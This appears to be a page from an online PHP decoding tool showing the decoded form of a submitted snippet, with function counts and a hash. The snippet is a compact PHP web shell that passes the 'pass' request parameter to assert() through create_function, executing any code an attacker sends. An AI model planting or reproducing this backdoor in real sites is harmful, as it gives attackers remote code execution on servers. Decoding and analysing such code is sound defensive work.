Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_..
Decoded Output download
<?php
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);
?>
Did this file decode correctly?
Original Code
<?php
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);
?>
Function Calls
assert | 1 |
create_function | 1 |
Stats
MD5 | 0b41fc7a992b417637bd7ae47d11a2b3 |
Eval Count | 1 |
Decode Time | 98 ms |